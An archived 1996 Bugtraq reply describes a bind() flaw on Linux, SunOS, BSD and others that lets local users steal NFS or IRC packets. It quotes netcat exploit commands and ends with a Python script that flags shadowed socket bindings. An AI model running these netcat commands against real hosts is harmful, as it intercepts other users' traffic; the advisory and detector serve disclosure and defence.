Bugtraq mailing list archives
Re: BoS: bind() Security Problems
From: Bernd.Lehle () RUS Uni-Stuttgart DE (Bernd Lehle)
Date: Wed, 31 Jan 1996 13:18:29 +0100
System Call: bind()
Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
                           Probably others.
Requirement: account on system.
Security Compromise: Stealing packets from nfsd, yppasswd, ircd, etc.
Credits: *Hobbit* <hobbit () avian org>
         bitblt <bitblt () infosoc com>
         Aleph One <aleph1 () underground org>
Synopsis: bind() does not properly check to make sure there is not a socket
          already bound to INADDR_ANY on the same port when binding to a
          specific address.

IRIX 5.3 is vulnerable, too.
Exploit:
[..]
Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

To take a look at irc packets:

nc -v -v -l -s Your.IP.Adress -p 6667

--
Bernd Lehle - Stuttgart University Computer Center  * A supercomputer <
Visualization / SFB 382 / Astrophysics              * is a machine    <
lehle () rus uni-stuttgart de Tel:+49-711-685-5531  * that runs an    <
http://www.tat.physik.uni-tuebingen.de/~lehle       * endless loop    <
pgp? -> finger bernd () visbl rus uni-stuttgart de  * in 2 seconds    <
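
The condition in the synopsis can be audited from a host's socket table. The following is an added example, not part of the original post: it flags any port where a socket bound to a specific address coexists with a wildcard (INADDR_ANY) socket owned by a different user. The four-column input format, the uids and the function names are assumptions made for the example; the sample lines are constructed.

```python
"""Flag ports where a specific-address socket shadows a wildcard-bound one."""
from collections import defaultdict

# Constructed sample in a simplified format (not real tool output):
# proto, local address:port, owning uid, program name.
SAMPLE = """\
udp 0.0.0.0:2049 0 nfsd
udp 192.88.209.5:2049 1001 nc
tcp 0.0.0.0:6667 77 ircd
tcp 0.0.0.0:22 0 sshd
udp 0.0.0.0:53 53 named
udp 127.0.0.1:53 53 named
"""

WILDCARDS = {"0.0.0.0", "*", "::"}


def parse(text):
    """Yield (proto, addr, port, uid, prog) for each well-formed line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        proto, local, uid, prog = fields
        addr, _, port = local.rpartition(":")
        if not port.isdigit() or not uid.isdigit():
            continue
        yield proto, addr.strip("[]"), int(port), int(uid), prog


def find_shadowed(text):
    """Return (proto, port, wildcard_prog, addr, prog, uid) per finding."""
    by_port = defaultdict(list)
    for proto, addr, port, uid, prog in parse(text):
        by_port[(proto, port)].append((addr, uid, prog))
    findings = []
    for (proto, port), socks in sorted(by_port.items()):
        wild = [s for s in socks if s[0] in WILDCARDS]
        specific = [s for s in socks if s[0] not in WILDCARDS]
        for w_addr, w_uid, w_prog in wild:
            for addr, uid, prog in specific:
                if uid != w_uid:  # same owner is ordinary multi-binding
                    findings.append((proto, port, w_prog, addr, prog, uid))
    return findings


if __name__ == "__main__":
    for f in find_shadowed(SAMPLE):
        print("%s/%d: %s on wildcard, but %s is bound by %s (uid %d)" % f)
```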